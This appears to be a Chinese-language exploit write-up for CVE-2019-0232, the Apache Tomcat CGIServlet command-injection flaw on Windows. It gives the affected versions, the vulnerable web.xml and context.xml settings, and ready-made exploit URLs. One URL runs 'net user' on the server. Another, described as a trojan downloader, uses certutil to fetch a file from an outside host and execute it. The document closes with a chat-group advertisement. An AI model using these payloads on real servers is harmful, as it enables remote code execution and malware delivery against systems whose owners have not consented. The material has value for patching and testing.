CVE-2019-0232-EXP
测试环境为Win10 Home 1809,jre版本为18.3 (build 10.0.2+13),Tomcat版本为9.0.13。

受影响Tomcat版本 
★Apache Tomcat 9.0.0.M1 to 9.0.17
★Apache Tomcat 8.5.0 to 8.5.39
★Apache Tomcat 7.0.0 to 7.0.93

配置 conf/web.xml 
<servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param>
      <param-name>cgiPathPrefix</param-name>
      <param-value>WEB-INF/cgi-bin</param-value>
    </init-param>
    <init-param>
      <param-name>enableCmdLineArguments</param-name>
      <param-value>true</param-value>
    </init-param>
    <init-param>
      <param-name>executable</param-name>
      <param-value></param-value>
    </init-param>
    <load-on-startup>5</load-on-startup>
</servlet>
配置Servlet Mappings:

<servlet-mapping>
        <servlet-name>cgi</servlet-name>
        <url-pattern>/cgi-bin/*</url-pattern>
</servlet-mapping>
配置 conf/context.xml 
添加 privileged="true"属性

<Context privileged="true">
   <WatchedResource>WEB-INF/web.xml</WatchedResource>
   <WatchedResource>WEB-INF/tomcat-web.xml</WatchedResource>
   <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>
</Context>
最后在webapps/ROOT/WEB-INF文件夹下建立hello.bat空文件,里面可以什么都不用写。 启动Tomcat,打开浏览器,访问下面链接: http://localhost:8080/cgi-bin/hello.bat?&C%3a%5cWindows%5cSystem32%5Cnet+user

注入测试

漏洞利用场景 
构造一个注入链接,实现一个图片(木马)下载器的功能: http://localhost:8080/cgi-bin/hello.bat?&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3a%2f%2fb.hiphotos.baidu.com%2fimage%2fpic%2fitem%2f9825bc315c6034a8ef5250cec5134954082376c9.jpg+1.jpg+%26start+1.jpg

附件下载地址 欢迎加入小胖网络交流群 795467385